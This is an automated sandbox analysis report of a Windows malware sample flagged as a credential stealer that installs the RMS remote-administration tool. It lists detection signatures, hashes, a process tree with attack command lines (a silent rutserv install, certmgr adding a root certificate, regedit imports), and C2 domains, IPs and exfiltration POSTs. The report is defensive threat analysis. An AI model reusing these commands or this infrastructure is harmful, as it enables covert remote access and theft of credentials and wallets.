Play interactive tour

Edit tour

Analysis Report 1wOdXavtlE.exe

Overview

General Information

Sample Name:	1wOdXavtlE.exe
Analysis ID:	383846
MD5:	a7e67e6abd539aeddbb9021d23f6f217
SHA1:	cea85a6d9e417f2b8c2b3962a1359defc096e502
SHA256:	f1849f447bfa07c3a9a9db11501a026d133541d0264424198f297f5ec70e1ff3
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

RMSRemoteAdmin

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Connects to many ports of the same IP (likely port scanning)

DLL side loading technique detected

Drops executables to the windows directory (C:\Windows) and starts them

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses regedit.exe to modify the Windows registry

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected RMS RemoteAdmin tool

Classification

Startup

System is w10x64

1wOdXavtlE.exe (PID: 6844 cmdline: 'C:\Users\user\Desktop\1wOdXavtlE.exe' MD5: A7E67E6ABD539AEDDBB9021D23F6F217)

1wOdXavtlE.exe (PID: 6980 cmdline: {path} MD5: A7E67E6ABD539AEDDBB9021D23F6F217)

iexplore.exe (PID: 6732 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7 MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6852 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5872 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6864 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7 MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

servs.exe (PID: 2924 cmdline: 'C:\Users\user\AppData\Local\Temp\servs.exe' MD5: 6DF7008811F88EEB253064A99C79F234)

servs.tmp (PID: 6552 cmdline: 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe' MD5: C1B49299EB51AFA1264D69FC022BB49B)

cmd.exe (PID: 6396 cmdline: 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PasswordOnWakeSettingFlyout.exe (PID: 6428 cmdline: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe MD5: F0C8675F98E397383A112CC8ED5B97DA)

pass.exe (PID: 5880 cmdline: C:\ProgramData\pass.exe MD5: A5E2BB848405DFC3A56FC892B691B614)

pass.tmp (PID: 5400 cmdline: 'C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp' /SL5='$10584,9506241,724480,C:\ProgramData\pass.exe' MD5: C1B49299EB51AFA1264D69FC022BB49B)

cmd.exe (PID: 5712 cmdline: 'C:\Windows\system32\cmd.exe' /c 'regedit /s C:\ProgramData\Immunity\ses.reg' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regedit.exe (PID: 6912 cmdline: regedit /s C:\ProgramData\Immunity\ses.reg MD5: AC91328EE5CFFBD695CE912F75F876F6)

cmd.exe (PID: 5224 cmdline: 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\Immunity\install.cmd'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

CertMgr.Exe (PID: 5848 cmdline: certmgr.exe -add -c Sert.cer -s -r localMachine Root MD5: 229EE3F6A87B33F0C6E589C0EA3CC085)

rutserv.exe (PID: 1684 cmdline: 'rutserv.exe' /silentinstall MD5: 43B697A1A52D948FCBEAE234C3CBD21E)

timeout.exe (PID: 1180 cmdline: TIMEOUT /T 8 MD5: EB9A65078396FB5D4E3813BB9198CB18)

ssevs.exe (PID: 6444 cmdline: 'C:\Users\user\AppData\Local\Temp\ssevs.exe' MD5: 17A490DB01806E788407EC152760E5B8)

ssevs.exe (PID: 5728 cmdline: {path} MD5: 17A490DB01806E788407EC152760E5B8)

sssevs.exe (PID: 5328 cmdline: 'C:\Users\user\AppData\Local\Temp\sssevs.exe' MD5: 7B640BAE01407187610BA076D5509628)

sssevs.exe (PID: 4748 cmdline: {path} MD5: 7B640BAE01407187610BA076D5509628)

svchost.exe (PID: 6904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3252 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6692 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2468 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author
C:\ProgramData\Immunity\is-2SOD7.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Immunity\is-4BBH3.tmp	JoeSecurity_RMSRemoteAdmin	Yara detected RMS RemoteAdmin tool	Joe Security
C:\ProgramData\Immunity\is-4BBH3.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000025.00000002.570035288.00000000015DA000.00000002.00020000.sdmp	JoeSecurity_RMSRemoteAdmin	Yara detected RMS RemoteAdmin tool	Joe Security
00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000000.537867326.00000000015DA000.00000002.00020000.sdmp	JoeSecurity_RMSRemoteAdmin	Yara detected RMS RemoteAdmin tool	Joe Security
00000025.00000002.549143519.0000000000401000.00000020.00020000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000025.00000000.508478042.0000000000401000.00000020.00020000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: 1wOdXavtlE.exe PID: 6844	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\is-PFD3D.tmp	ReversingLabs: Detection: 55%
Source: C:\ProgramData\is-R3F67.tmp	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\servs.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Metadefender: Detection: 18%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Show sources

Source: 1wOdXavtlE.exe	Metadefender: Detection: 16%			Perma Link
Source: 1wOdXavtlE.exe	ReversingLabs: Detection: 58%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: 1wOdXavtlE.exe

Joe Sandbox ML: detected

Source: 1wOdXavtlE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: C:\ProgramData\Immunity\rutserv.exe

File created: C:\ProgramData\Remote Manipulator System\install.log

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2

Source: 1wOdXavtlE.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source:	Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040B268 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005E9B24 FindFirstFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040CBFC FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,

Networking:

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 86.107.197.8 ports 1,2,3,4,8,38214

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763

Source: global traffic	TCP traffic: 192.168.2.6:49761 -> 86.107.197.8:38214
Source: global traffic	TCP traffic: 192.168.2.6:49763 -> 195.54.160.9:32972

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: pokacienon.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: pokacienon.xyzContent-Length: 1137076Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: pokacienon.xyzContent-Length: 1137062Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 86.107.197.8:38214Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 195.54.160.9:32972Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 86.107.197.8:38214Content-Length: 856112Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 86.107.197.8:38214Content-Length: 856098Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 195.54.160.9:32972Content-Length: 23182Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 195.54.160.9:32972Content-Length: 23168Expect: 100-continueAccept-Encoding: gzip, deflate

Source: Joe Sandbox View

IP Address: 104.192.141.1 104.192.141.1

Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8

Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z\|\|.\|\|646da06c-a69a-4aff-bcc8-3f5a349348ca\|\|1152921505693336001\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","X